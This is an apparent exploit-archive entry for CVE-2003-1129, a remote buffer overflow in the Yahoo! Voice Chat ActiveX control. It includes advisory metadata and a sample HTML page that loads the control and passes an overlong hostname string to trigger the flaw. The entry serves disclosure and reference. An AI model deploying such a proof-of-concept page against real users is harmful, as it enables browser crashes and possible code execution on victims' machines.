Yahoo! Voice Chat ActiveX Control 1.0.0.43 - Remote Buffer Overflow
Author: cesaro
type: remote
platform: windows
port:
date_added: 2003-05-12
date_updated: 2012-11-10
verified: 1
codes: CVE-2003-1129;OSVDB-4651
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/7561/info
It has been reported that the ActiveX control used by the Yahoo! Voice Chat feature is prone to an exploitable buffer overflow vulnerability. This issue can be exploited via a malicious web page that calls the vulnerable control with malformed parameters. Although unconfirmed, it has been conjectured that this condition may be exploited to execute arbitrary code.
------sample.htm-----------
<OBJECT id=yahooaudio type="application/x-oleobject"
classid="clsid:2B323CD9-50E3-11D3-9466-00A0C9700498">
</OBJECT>
<script>
yahooaudio.hostname="longstringheremorethan500chars";
yahooaudio.createandjoinconference();
</script>
---------------------------